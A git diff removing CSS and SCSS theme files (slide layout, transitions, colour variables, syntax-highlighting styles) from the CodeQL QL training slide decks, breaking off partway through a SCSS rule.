background: linear-gradient(to right, #e6e6e6, #e6e6e6) no-repeat; - -moz-background-size: 0% 100%; - -o-background-size: 0% 100%; - -webkit-background-size: 0% 100%; - background-size: 0% 100%; - -moz-transition: all 0.5s ease-out 0.5s; - -o-transition: all 0.5s ease-out 0.5s; - -webkit-transition: all 0.5s ease-out; - -webkit-transition-delay: 0.5s; - transition: all 0.5s ease-out 0.5s; - /* Better to transition only on background-size, but not sure how to do that with the mixin. */ -} -/* line 859, ../scss/default.scss */ -aside.gdbar.right { - right: 0; - left: -moz-initial; - left: initial; - top: 254px; - /* 96 is height of gray icon bar */ - -moz-transform: rotateZ(180deg); - -ms-transform: rotateZ(180deg); - -webkit-transform: rotateZ(180deg); - transform: rotateZ(180deg); -} -/* line 866, ../scss/default.scss */ -aside.gdbar.right img { - -moz-transform: rotateZ(180deg); - -ms-transform: rotateZ(180deg); - -webkit-transform: rotateZ(180deg); - transform: rotateZ(180deg); -} -/* line 871, ../scss/default.scss */ -aside.gdbar.bottom { - top: -moz-initial; - top: initial; - bottom: 60px; -} -/* line 877, ../scss/default.scss */ -aside.gdbar img { - width: 85px; - height: 85px; - position: absolute; - right: 0; - margin: 8px 15px; -} - -/* line 888, ../scss/default.scss */ -.title-slide hgroup { - margin-top: 20%; -} -/* line 891, ../scss/default.scss */ -.title-slide hgroup h1 { - font-size: 2em; - line-height: 1.4; - color: white; - margin: auto; - display: block; - position: absolute; - top: 0; - bottom: 10%; - left: 1.25em; - height: 0; -} -/* line 898, ../scss/default.scss */ -.title-slide hgroup h2 { - font-size: 2em; - color: #a9a9a9; - font-weight: inherit; -} -/* line 904, ../scss/default.scss */ -.title-slide hgroup p { - font-size: 1.5em; - color: #797979; - line-height: 1.3; - margin-top: 2em; -} - -/* line 913, ../scss/default.scss */ -.quote { - color: black; - font-style: italic; - font-size: 1em; - padding: 0.5em; -} -/* line 916, ../scss/default.scss */ -.quote .author { - font-size: 24px; - position: absolute; - bottom: 80px; - line-height: 1.4; -} - -/* line 925, ../scss/default.scss */ -[data-config-contact] a { - color: white; - border-bottom: none; -} -/* line 929, ../scss/default.scss */ -[data-config-contact] span { - width: 115px; - display: inline-block; -} - -/* line 938, ../scss/default.scss */ -.overview.popup .note { - display: none !important; -} -/* line 944, ../scss/default.scss */ -.overview slides slide { - display: block; - cursor: pointer; - opacity: 0.5; - pointer-events: auto !important; - background: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iI2ZmZmZmZiIvPjxzdG9wIG9mZnNldD0iODUlIiBzdG9wLWNvbG9yPSIjZmZmZmZmIi8+PHN0b3Agb2Zmc2V0PSIxMDAlIiBzdG9wLWNvbG9yPSIjZTZlNmU2Ii8+PC9saW5lYXJHcmFkaWVudD48L2RlZnM+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZmlsbD0idXJsKCNncmFkKSIgLz48L3N2Zz4g'); - background: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #ffffff), color-stop(85%, #ffffff), color-stop(100%, #e6e6e6)); - background: -moz-linear-gradient(#ffffff, #ffffff 85%, #e6e6e6); - background: -webkit-linear-gradient(#ffffff, #ffffff 85%, #e6e6e6); - background: linear-gradient(#ffffff, #ffffff 85%, #e6e6e6); - background-color: white; -} -/* line 945, ../scss/default.scss */ -.overview slides slide.backdrop { - display: none !important; -} -/* line 956, ../scss/default.scss */ -.overview slides slide.far-past, .overview slides slide.past, .overview slides slide.next, .overview slides slide.far-next, .overview slides slide.far-past { - opacity: 0.5; - display: block; -} -/* line 965, ../scss/default.scss */ -.overview slides slide.current { - opacity: 1; -} -/* line 971, ../scss/default.scss */ -.overview .slide-area { - display: none; -} - -/****** Semmle-specific styles *********/ - -/* rst markup */ -strong { - font-weight: bold; -} - -em { - font-style: italic; -} - -sup { - vertical-align: super; - font-size: 0.5em; -} - -/*custom slide styles */ -/* general */ -slide { - background-image: url("../../normal-slide.svg"); - background-size: cover; - width: 100%; - height: 100%; - overflow: auto; - transform: scale(1); -} - -.highlight { - width: auto; - background: transparent !important; - margin-bottom: 2%; -} - -p { - color: black; - font-size: 1em; -} - -article { - margin-top: 3%; -} - -hgroup .pre { - color: #5c31ff; -} - -/* title slide (deck title, subtitle)*/ - -.title-slide { - background-image: url("../../title-slide.svg"); - background-size: cover; -} - -.title-slide p { - color: white; - font-size: 1em; - position: absolute; - bottom: 30%; - left: 2.6em; -} - -.title-slide hgroup .pre { - color: white; -} - -.subheading { - position: absolute; - top: 62.5%; - left: 0; -} - -.subheading p { - position: relative; -} - -/* purple background slides (new section)*/ - -.background2 { - background-image: url("../../alternative-slide.svg"); - background-size: cover; -} - -.background2 h2 { - color: white; -} - -.background2 p { - color: #5c31ff; - font-size: 1.5em; -} - -/* setup and agenda slides */ - -.setup, .agenda { - background-image: url("../../setup-slide.svg"); - background-size: cover; -} - -.setup article, .agenda article { - margin-top: 3%; - border-left: 1px solid #5c31ff; - top: 0; - bottom: 0; - right: 0; - left: 0; - margin: auto; - width: 50%; - height: fit-content; - padding: 2%; -} - -.setup li { - line-height: 1.5em; - margin-top: 1.5em; -} - -.agenda li { - margin:0; -} - -.setup ul, .agenda ul { - padding: 0; -} - -.setup hgroup, .agenda hgroup { - position: relative; - margin: 7% 0 0 17%; -} - -/* end slide */ - -.end-slide { - background-image: url("../../end-slide.svg"); - background-size: 100% 100%; - background-color: #5c31ff; -} - -/* styles for side by side columns */ - -.column-left { - float: left; -} - -.column-right { - float: right; -} - -.column-left, .column-right { - padding: 0px; - width: 45%; - line-height: 1.2em; - color: black; -} - -.column-right img, .column-left img { - display: block; - margin-left: auto; - margin-right: auto; -} - -.column-right .highlight, .column-left .highlight { - max-width: 100%; -} - -/* admonition (speaker notes) styles */ - -p.first.admonition-title { - display: none; -} - -.admonition.note { - text-align: left; - font-size: 0.8em; - width: 100%; - overflow: auto; - border: 1px solid black; -} - -.admonition.note pre { - font-family: 'consolas', 'Courier New', monospace; - background-color: white; - padding: 0; - margin-bottom: 10px; -} - -.admonition.note .notranslate { - width: 100%; -} - -.admonition.note > p { - width: inherit; - font-size: 1em; -} - -.admonition.note ul li { - width: inherit; -} - - -/* styles for information buttons on slides that have notes */ - -#extra-notes { - display: block; - position: fixed; - top: 0; - right: 1%; - font-size: 1em; -} - -#close-notes { - display: block; - position: fixed; - top: 0; - right: 0; - font-size: 1.2em; -} - -button { - border: none; - background: none; -} - -button:hover { - text-decoration: underline; -} - -/********* images ************/ -/* general styles to scale and centre images*/ - -.image-box { - display: grid; - height: 100%; -} - -img { - width: 50%; - margin: auto; -} - -/********* deck-specific styles for individual images *********/ -/* intro to ql */ -img.analysis { - width: 90%; -} - -/* program representation*/ -.ast-graph { - width: 66%; - position: absolute; - right: -10%; -} - -.java-expression-ast { - background-image: url("../../java-expression-ast.svg"); - background-size: cover; -} - -/* java data flow code example */ - -.java-data-flow-code-example { - background-image: url("../../java-data-flow-code-example.svg"); - background-size: cover; -} - -/* extra global data flow slies*/ - -.mismatched-calls-and-returns { - background-image: url("../../mismatched-calls-and-returns.svg"); - background-size: cover; -} - -/******* Other custom styles *******/ -/* custom styles for lists*/ - -ol { - color: black; -} - -li > ul > li { - margin-bottom: 0; -} - -.admonition.note ol { - width: 90%; - margin-left: 2.2em; -} - -.admonition.note ol > li { - margin-top: 0.5em; -} - -/* - * extra styles for more appropriate for syntax highlighting - * - */ - - span.n, span.p, span.o { - color: black !important; - } - - .highlight { color: #333 !important} /* default */ - .highlight .s { color: #06994a !important} /* strings */ - .highlight .m { color: #333 } /* numbers (no special highlighting) */ - .highlight .c1 { color: #007020 !important; font-style: italic !important} /* one-line comments */ - .highlight .cm { color: #007020 !important; font-style: italic !important} /* multiline comments */ - .highlight .cp { color: #2F1695 !important; font-style: italic !important} /* QLDoc comments */ - .highlight .k { color: #7a65cd !important; font-weight: bold !important} /* keywords */ - .highlight .kt { color: #7a65cd !important; font-weight: bold !important} /* built-in type keywords */ - .highlight .kr { color: #333 !important; font-style: italic !important} /* annotations */ - - -@media print { - /* line 978, ../scss/default.scss */ - slides slide { - display: block !important; - position: relative; - /*background: url('data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gPHN2ZyB2ZXJzaW9uPSIxLjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PGRlZnM+PGxpbmVhckdyYWRpZW50IGlkPSJncmFkIiBncmFkaWVudFVuaXRzPSJvYmplY3RCb3VuZGluZ0JveCIgeDE9IjAuNSIgeTE9IjAuMCIgeDI9IjAuNSIgeTI9IjEuMCI+PHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iI2ZmZmZmZiIvPjxzdG9wIG9mZnNldD0iODUlIiBzdG9wLWNvbG9yPSIjZmZmZmZmIi8+PHN0b3Agb2Zmc2V0PSIxMDAlIiBzdG9wLWNvbG9yPSIjZTZlNmU2Ii8+PC9saW5lYXJHcmFkaWVudD48L2RlZnM+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZmlsbD0idXJsKCNncmFkKSIgLz48L3N2Zz4g'); - background: -webkit-gradient(linear, 50% 0%, 50% 100%, color-stop(0%, #ffffff), color-stop(85%, #ffffff), color-stop(100%, #e6e6e6)); - background: -moz-linear-gradient(#ffffff, #ffffff 85%, #e6e6e6); - background: -webkit-linear-gradient(#ffffff, #ffffff 85%, #e6e6e6); - background: linear-gradient(#ffffff, #ffffff 85%, #e6e6e6); - background-color: white;*/ - -moz-transform: none !important; - -ms-transform: none !important; - -webkit-transform: none !important; - transform: none !important; - width: 100%; - height: 100%; - page-break-after: always !important; - top: auto !important; - left: auto !important; - bottom: unset; - margin-top: 0 !important; - margin-left: 0 !important; - opacity: 1 !important; - color: #555; - font-size: 100%; - } - /* line 993, ../scss/default.scss */ - slides slide.far-past, slides slide.past, slides slide.next, slides slide.far-next, slides slide.far-past, slides slide.current { - opacity: 1 !important; - display: block !important; - } - /* line 1004, ../scss/default.scss */ - slides slide .build > * { - -moz-transition: none; - -o-transition: none; - -webkit-transition: none; - transition: none; - } - /* line 1008, ../scss/default.scss */ - slides slide .build .to-build, - slides slide .build .build-fade { - opacity: 1; - } - /* line 1014, ../scss/default.scss */ - slides slide .auto-fadein { - opacity: 1 !important; - } - /* line 1018, ../scss/default.scss */ - slides slide.backdrop { - display: none !important; - } - /* line 1022, ../scss/default.scss */ - slides slide table.rows { - border-right: 0; - } - /* line 1027, ../scss/default.scss */ - slides slide[hidden] { - display: none !important; - } - - /* line 1032, ../scss/default.scss */ - .slide-area { - display: none; - } - - /* line 1036, ../scss/default.scss */ - .reflect { - -webkit-box-reflect: none; - -moz-box-reflect: none; - -o-box-reflect: none; - -ms-box-reflect: none; - box-reflect: none; - } - - /* line 1044, ../scss/default.scss */ - pre, code { - font-family: monospace !important; - } - - /* make notes appear on slides for print view*/ - - .note { - position: unset; - } - - /* don't display slide number */ - slides > slide:not(.nobackground):after { - display: none; - } - - slides { - width: 90%; - height: 100%; - } -} diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/hieroglyph.css b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/hieroglyph.css deleted file mode 100644 index a919b0341141..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/hieroglyph.css +++ /dev/null @@ -1,84 +0,0 @@ -/* line 5, ../scss/hieroglyph.scss */ -ol { - margin-left: 1.2em; - margin-bottom: 1em; - position: relative; - list-style: decimal; -} -/* line 11, ../scss/hieroglyph.scss */ -ol li { - margin-bottom: 0.5em; -} -/* line 14, ../scss/hieroglyph.scss */ -ol li ol { - margin-left: 2em; - margin-bottom: 0; - list-style: decimal; -} -/* line 19, ../scss/hieroglyph.scss */ -ol li ol li:before { - font-weight: 600; -} -/* line 25, ../scss/hieroglyph.scss */ -ol ol { - margin-top: .5em; - list-style: decimal; -} - -/* line 32, ../scss/hieroglyph.scss */ -slide.title-image { - padding-right: 0px; -} -/* line 36, ../scss/hieroglyph.scss */ -slide.title-image hgroup { - position: static !important; - margin-top: 35%; - padding-left: 30px; - background: rgba(255, 255, 255, 0.7); - border-top-left-radius: 5px; - -webkit-border-top-left-radius: 5px; - -moz-border-top-left-radius: 5px; - -o-border-top-left-radius: 5px; -} -/* line 50, ../scss/hieroglyph.scss */ -slide.title-image hgroup + article { - background: rgba(255, 255, 255, 0.7); - margin-top: 0px; - padding-left: 30px; - border-bottom-left-radius: 5px; - -webkit-border-bottom-left-radius: 5px; - -moz-border-bottom-left-radius: 5px; - -o-border-bottom-left-radius: 5px; -} -/* line 62, ../scss/hieroglyph.scss */ -slide.title-image h1 { - color: #222; - font-size: 3.2em; - line-height: 1.5em; - font-weight: 500; -} -/* line 72, ../scss/hieroglyph.scss */ -slide.title-image div.figure img { - position: absolute; - left: 0; - top: 0; - min-width: 100%; - min-height: 100%; - border-radius: 5px; - -o-border-radius: 5px; - -moz-border-radius: 5px; - -webkit-border-radius: 5px; - z-index: -1; -} -/* line 87, ../scss/hieroglyph.scss */ -slide.title-image div.figure .caption { - color: black; - background: rgba(255, 255, 255, 0.25); - padding: 0 5px; - border-bottom-left-radius: 5px; - border-top-right-radius: 5px; - position: absolute; - left: 0; - bottom: 0; - margin-bottom: 0; -} diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/io2013.css b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/io2013.css deleted file mode 100644 index b42982b21c91..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/io2013.css +++ /dev/null @@ -1,55 +0,0 @@ -/* line 5, ../scss/io2013.scss */ -* { - line-height: 1.3; -} - -/* line 9, ../scss/io2013.scss */ -h2 { - font-weight: bold; -} - -/* line 12, ../scss/io2013.scss */ -h2, h3 { - color: #515151; -} - -/* line 16, ../scss/io2013.scss */ -q, blockquote { - font-weight: bold; -} - -/* line 20, ../scss/io2013.scss */ -slides > slide { - color: #515151; -} -/* line 24, ../scss/io2013.scss */ -slides > slide.title-slide:after { - content: ''; - background: url(../../images/io2013/google-io-lockup-1.png) no-repeat 100% 50%; - -moz-background-size: contain; - -o-background-size: contain; - -webkit-background-size: contain; - background-size: contain; - position: absolute; - bottom: 80px; - right: 40px; - width: 100%; - height: 90px; -} -/* line 36, ../scss/io2013.scss */ -slides > slide.title-slide hgroup h1 { - font-weight: bold; - line-height: 1.1; -} -/* line 40, ../scss/io2013.scss */ -slides > slide.title-slide hgroup h2, slides > slide.title-slide hgroup p { - color: #515151; -} -/* line 43, ../scss/io2013.scss */ -slides > slide.title-slide hgroup h2 { - margin-top: 0.25em; -} -/* line 46, ../scss/io2013.scss */ -slides > slide.title-slide hgroup p { - margin-top: 3em; -} diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/phone.css b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/phone.css deleted file mode 100644 index 017c7bbf60df..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/css/phone.css +++ /dev/null @@ -1,26 +0,0 @@ -/*Smartphones (portrait and landscape) ----------- */ -/*@media only screen -and (min-width : 320px) -and (max-width : 480px) { - -}*/ -/* Smartphones (portrait) ----------- */ -/* Styles */ -/* line 17, ../scss/phone.scss */ -slides > slide { - /* width: $slide-width !important; - height: $slide-height !important; - margin-left: -$slide-width / 2 !important; - margin-top: -$slide-height / 2 !important; - */ - -webkit-transition: none !important; - -moz-transition: none !important; - -o-transition: none !important; - -webkit-transition: none !important; - transition: none !important; -} - -/* iPhone 4 ----------- */ -@media only screen and (-webkit-min-device-pixel-ratio: 1.5), only screen and (min-device-pixel-ratio: 1.5) { - /* Styles */ -} diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/_base.scss b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/_base.scss deleted file mode 100644 index 50504db99b75..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/_base.scss +++ /dev/null @@ -1,139 +0,0 @@ -@charset "UTF-8"; - -@import "compass/reset"; -@import "compass/css3/border-radius"; -@import "compass/css3/box"; -@import "compass/css3/box-shadow"; -@import "compass/css3/box-sizing"; -@import "compass/css3/images"; -@import "compass/css3/text-shadow"; -@import "compass/css3/background-size"; -@import "compass/css3/transform"; -@import "compass/css3/transition"; - -@import "variables"; - -@mixin font-smoothing($val: antialiased) { - -webkit-font-smoothing: $val; - -moz-font-smoothing: $val; - -ms-font-smoothing: $val; - -o-font-smoothing: $val; -} - -@mixin flexbox { - display: -webkit-box !important; - display: -moz-box !important; - display: -ms-box !important; - display: -o-box !important; - display: box !important; -} - -@mixin flex-center-center { - @include box-orient(vertical); - @include box-align(center); - @include box-pack(center); -} - -@mixin flex-left-center { - @include box-orient(vertical); - @include box-align(left); - @include box-pack(center); -} - -@mixin flex-right-center { - @include box-orient(vertical); - @include box-align(end); - @include box-pack(center); -} - -/** - * Base SlideDeck Styles - */ -html { - height: 100%; - overflow: hidden; -} - -body { - margin: 0; - padding: 0; - - opacity: 0; - - height: 100%; - min-height: 740px; - width: 100%; - - overflow: hidden; - - color: #fff; - @include font-smoothing(antialiased); - @include transition(opacity 800ms ease-in 100ms); // Add small delay to prevent jank. - - &.loaded { - opacity: 1 !important; - } -} - -input, button { - vertical-align: middle; -} - -slides > slide[hidden] { - display: none !important; -} - -slides { - width: 100%; - height: 100%; - position: absolute; - left: 0; - top: 0; - @include transform(translate3d(0, 0, 0)); - @include perspective(1000); - @include transform-style(preserve-3d); - @include transition(opacity 800ms ease-in 100ms); // Add small delay to prevent jank. -} - -slides > slide { - display: block; - position: absolute; - overflow: hidden; - left: 50%; - top: 50%; - @include box-sizing(border-box); -} - -/* Slide styles */ - - -/*article.fill iframe { - position: absolute; - left: 0; - top: 0; - width: 100%; - height: 100%; - - border: 0; - margin: 0; - - @include border-radius(10px); - - z-index: -1; -} - -slide.fill { - background-repeat: no-repeat; - @include background-size(cover); -} - -slide.fill img { - position: absolute; - left: 0; - top: 0; - min-width: 100%; - min-height: 100%; - - z-index: -1; -} -*/ diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/_variables.scss b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/_variables.scss deleted file mode 100644 index d07f90720704..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/_variables.scss +++ /dev/null @@ -1,34 +0,0 @@ -$social-tags: ''; -$brand-small-icon-size: 30px; - -$gray-1: #e6e6e6; -$gray-2: #a9a9a9; -$gray-3: #797979; -$gray-4: #515151; - -$brand-blue: rgb(67, 135, 253); -$brand-blue-secondary: #3c8ef3; -$brand-blue-secondary2: #2a7cdf; - -$brand-red: rgb(244, 74, 63); -$brand-red-secondary: #e0543e; -$brand-red-secondary2: #d94d3a; - -$brand-yellow: rgb(255, 209, 77); -$brand-yellow-secondary: #f9cc46; -$brand-yellow-secondary2: #f6c000; - -$brand-green: rgb(13, 168, 97); -$brand-green-secondary: #00a86d; -$brand-green-secondary2: #009f5d; - -$slide-width: 900px; -$slide-height: 700px; -$slide-width-widescreen: 1100px; -$slide-top-bottom-padding: 40px; -$slide-left-right-padding: 60px; -$slide-border-radius: 5px; - -$slide-tap-area-width: 100px; - -$article-content-top-padding: 45px; diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/default.scss b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/default.scss deleted file mode 100644 index b8c83b424ffa..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/theme/scss/default.scss +++ /dev/null @@ -1,1047 +0,0 @@ -@import "base"; -@import "compass/css3/columns"; -@import "compass/css3/user-interface"; - -@mixin highlight-color($color: $brand-yellow) { - -webkit-tap-highlight-color: $color; - -moz-tap-highlight-color: $color; - -ms-tap-highlight-color: $color; - -o-tap-highlight-color: $color; - tap-highlight-color: $color; -} - -@mixin backdrop { - @include background(linear-gradient(white, white 85%, $gray-1)); - background-color: white; -} - - -/** - * Theme Styles - */ -::selection { - color: white; - background-color: $brand-yellow; - @include text-shadow(none); -} - -::-webkit-scrollbar { - height: 16px; - overflow: visible; - width: 16px; -} -::-webkit-scrollbar-thumb { - background-color: rgba(0, 0, 0, .1); - background-clip: padding-box; - border: solid transparent; - min-height: 28px; - padding: 100px 0 0; - @include box-shadow(inset 1px 1px 0 rgba(0,0,0,.1),inset 0 -1px 0 rgba(0,0,0,.07)); - border-width: 1px 1px 1px 6px; -} -::-webkit-scrollbar-thumb:hover { - background-color: rgba(0, 0, 0, 0.5); -} -::-webkit-scrollbar-button { - height: 0; - width: 0; -} -::-webkit-scrollbar-track { - background-clip: padding-box; - border: solid transparent; - border-width: 0 0 0 4px; -} -::-webkit-scrollbar-corner { - background: transparent; -} - -body { - background: black; -} - -slides > slide { - display: none; - font-family: 'Open Sans', Arial, sans-serif; - font-size: 26px; - color: $gray-3; - //@include background(linear-gradient(white, white 85%, $gray-1)); - //background-color: white; - width: $slide-width; - height: $slide-height; - margin-left: -$slide-width / 2; - margin-top: -$slide-height / 2; - padding: $slide-top-bottom-padding $slide-left-right-padding; - - @include border-radius($slide-border-radius); - //@include box-shadow(5px 5px 20px $gray-4); - @include transition(all 0.6s ease-in-out); - - //$translateX: 1020px; - //$rotateY: 30deg; - //$rotateX: 45deg; - - &.far-past { - //display: block; - display: none; - //@include transform(translate(-$translateX * 2)); - //@include transform(translate3d(-$translateX * 2, 0, 0)); - } - - &.past { - display: block; - //@include transform(translate(-$translateX) rotateY($rotateY) rotateX($rotateX)); - //@include transform(translate3d(-$translateX, 0, 0) rotateY($rotateY) rotateX($rotateX)); - opacity: 0; - } - - &.current { - display: block; - //@include transform(translate(0)); - //@include transform(translate3d(0, 0, 0)); - opacity: 1; - - .auto-fadein { - opacity: 1; - } - - .gdbar { - @include background-size(100% 100%); - } - } - - &.next { - display: block; - //@include transform(translate($translateX) rotateY(-$rotateY) rotateX($rotateX)); - //@include transform(translate3d($translateX, 0, 0) rotateY(-$rotateY) rotateX($rotateX)); - opacity: 0; - pointer-events: none; - } - - &.far-next { - //display: block; - display: none; - //@include transform(translate($translateX * 2)); - //@include transform(translate3d($translateX * 2, 0, 0)); - } - - &.dark { - background: $gray-4 !important; - } - - &:not(.nobackground) { - //background: white url(../../images/google_developers_icon_128.png) ($brand-small-icon-size * 2) 98% no-repeat; - //@include background-size($brand-small-icon-size $brand-small-icon-size); - - &:before { - font-size: 12pt; - content: $social-tags; - position: absolute; - bottom: $slide-top-bottom-padding / 2; - left: $slide-left-right-padding; - // background: url(../../images/google_developers_icon_128.png) no-repeat 0 50%; - @include background-size($brand-small-icon-size $brand-small-icon-size); - padding-left: $brand-small-icon-size + 10; - height: $brand-small-icon-size; - line-height: 1.9; - } - &:after { - font-size: 12pt; - content: attr(data-slide-num) '/' attr(data-total-slides); - position: absolute; - bottom: $slide-top-bottom-padding / 2; - right: $slide-left-right-padding; - line-height: 1.9; - } - } - - &.title-slide { - &:after { - content: ''; - //background: url(../../images/io2012_logo.png) no-repeat 100% 50%; - //@include background-size(contain); - position: absolute; - bottom: $slide-top-bottom-padding; - right: $slide-top-bottom-padding; - width: 100%; - height: 60px; - } - } - - &.backdrop { - z-index: -10; - display: block !important; - @include backdrop; - - &:after, &:before { - display: none; // Prevent double set of slide nums and footer icons. - } - } - - > hgroup + article { - margin-top: $article-content-top-padding; - - &.flexbox { - &.vcenter, &.vleft, &.vright { - height: 80%; - } - } - - p { - margin-bottom: 1em; - } - } - - > article:only-child { - height: 100%; - - > iframe { - height: 98%; - } - } -} - -slides.layout-faux-widescreen > slide { - padding: $slide-top-bottom-padding 160px; -} - -slides.layout-widescreen, -slides.layout-faux-widescreen { - - $translateX: 1130px; - - > slide { - margin-left: -$slide-width-widescreen / 2; - width: $slide-width-widescreen; - } - - > slide.far-past { - display: block; - display: none; - @include transform(translate(-$translateX * 2)); - @include transform(translate3d(-$translateX * 2, 0, 0)); - } - - > slide.past { - display: block; - //@include transform(translate(-$translateX)); - //@include transform(translate3d(-$translateX, 0, 0)); - opacity: 0; - } - - > slide.current { - display: block; - //@include transform(translate(0)); - //@include transform(translate3d(0, 0, 0)); - opacity: 1; - } - - > slide.next { - display: block; - //@include transform(translate($translateX)); - //@include transform(translate3d($translateX, 0, 0)); - opacity: 0; - pointer-events: none; - } - - > slide.far-next { - display: block; - display: none; - @include transform(translate($translateX * 2)); - @include transform(translate3d($translateX * 2, 0, 0)); - } - - #prev-slide-area { - margin-left: -$slide-width-widescreen / 2 - $slide-tap-area-width; - } - - #next-slide-area { - margin-left: $slide-width-widescreen / 2; - } -} - -b { - font-weight: 600; -} - -a { - color: $brand-blue-secondary2; - text-decoration: none; - border-bottom: 1px solid rgba(42, 124, 223, 0.5); - - &:hover { - color: black !important; - } -} - -h1, h2, h3 { - font-weight: 600; -} - -h2 { - font-size: 45px; - line-height: 45px; - letter-spacing: -2px; - color: $gray-4; -} - -h3 { - font-size: 30px; - letter-spacing: -1px; - line-height: 2; - font-weight: inherit; - color: $gray-3; -} - -ul { - margin-left: 1.2em; - margin-bottom: 1em; - position: relative; - - li { - margin-bottom: 0.5em; - - ul { - margin-left: 2em; - margin-bottom: 0; - - li:before { - content: '-'; - font-weight: 600; - } - } - } - - > li:before { - content: '\00B7'; - margin-left: -1em; - position: absolute; - font-weight: 600; - } - - ul { - margin-top: .5em; - } -} - -// Code highlighting only effects the current slide. -.highlight-code slide.current { - pre > * { - opacity: 0.25; - @include transition(opacity 0.5s ease-in); - } - b { - opacity: 1; - } -} - -pre { - font-family: 'Source Code Pro', 'Courier New', monospace; - font-size: 20px; - line-height: 28px; - padding: 10px 0 10px $slide-left-right-padding; - letter-spacing: -1px; - margin-bottom: 20px; - width: 106%; - background-color: $gray-1; - left: -$slide-left-right-padding; - position: relative; - @include box-sizing(border-box); - /*overflow: hidden;*/ - - &[data-lang]:after { - content: attr(data-lang); - background-color: $gray-2; - right: 0; - top: 0; - position: absolute; - font-size: 16pt; - color: white; - padding: 2px 25px; - text-transform: uppercase; - } -} - -pre[data-lang="go"] { - color: #333; -} - -code { - font-size: 95%; - font-family: 'Source Code Pro', 'Courier New', monospace; - color: black; -} - -iframe { - width: 100%; - height: $slide-height - ($slide-top-bottom-padding * 2) - ($article-content-top-padding * 2); - background: white; - border: 1px solid $gray-1; - @include box-sizing(border-box); -} - -dt { - font-weight: bold; -} - -button { - display: inline-block; - @include background(linear-gradient(#F9F9F9 40%, #E3E3E3 70%)); - border: 1px solid $gray-2; - @include border-radius(3px); - padding: 5px 8px; - outline: none; - white-space: nowrap; - @include user-select(none); - cursor: pointer; - @include text-shadow(1px 1px #fff); - font-size: 10pt; -} - -button:not(:disabled):hover { - border-color: $gray-4; -} - -button:not(:disabled):active { - @include background(linear-gradient(#E3E3E3 40%, #F9F9F9 70%)); -} - -:disabled { - color: $gray-2; -} - -.blue { - color: $brand-blue; -} -.blue2 { - color: $brand-blue-secondary; -} -.blue3 { - color: $brand-blue-secondary2; -} -.yellow { - color: $brand-yellow; -} -.yellow2 { - color: $brand-yellow-secondary; -} -.yellow3 { - color: $brand-yellow-secondary2; -} -.green { - color: $brand-green; -} -.green2 { - color: $brand-green-secondary; -} -.green3 { - color: $brand-green-secondary2; -} -.red { - color: $brand-red; -} -.red2 { - color: $brand-red-secondary; -} -.red3 { - color: $brand-red-secondary2; -} -.gray { - color: $gray-1; -} -.gray2 { - color: $gray-2; -} -.gray3 { - color: $gray-3; -} -.gray4 { - color: $gray-4; -} - -.white { - color: white !important; -} -.black { - color: black !important; -} - -.columns-2 { - @include column-count(2); -} - -table { - width: 100%; - border-collapse: -moz-initial; - border-collapse: initial; - border-spacing: 2px; - border-bottom: 1px solid $gray-3; - - tr > td:first-child, th { - font-weight: 600; - color: $gray-4; - } - - tr:nth-child(odd) { - background-color: $gray-1; - } - - th { - color: white; - font-size: 18px; - @include background(linear-gradient(top, $brand-blue 40%, $brand-blue-secondary2 80%) no-repeat); - } - - td, th { - font-size: 18px; - padding: 1em 0.5em; - } - - td.highlight { - color: $gray-4; - @include background(linear-gradient(top, $brand-yellow 40%, $brand-yellow-secondary2 80%) no-repeat); - } - - &.rows { - border-bottom: none; - border-right: 1px solid $gray-3; - } -} - -q { - font-size: 45px; - line-height: 72px; - - &:before { - content: '“'; - position: absolute; - margin-left: -0.5em; - } - &:after { - content: 'â€'; - position: absolute; - margin-left: 0.1em; - } -} - -slide.fill { - background-repeat: no-repeat; - @include border-radius($slide-border-radius); - @include background-size(cover); -} - -/* Size variants */ - -article.smaller { - p, ul { - font-size: 20px; - line-height: 24px; - letter-spacing: 0; - } - table { - td, th { - font-size: 14px; - } - } - pre { - font-size: 15px; - line-height: 20px; - letter-spacing: 0; - } - q { - font-size: 40px; - line-height: 48px; - - &:before, &:after { - font-size: 60px; - } - } -} - -/* Builds */ - -.build { - > * { - @include transition(opacity 0.5s ease-in-out 0.2s); - } - - 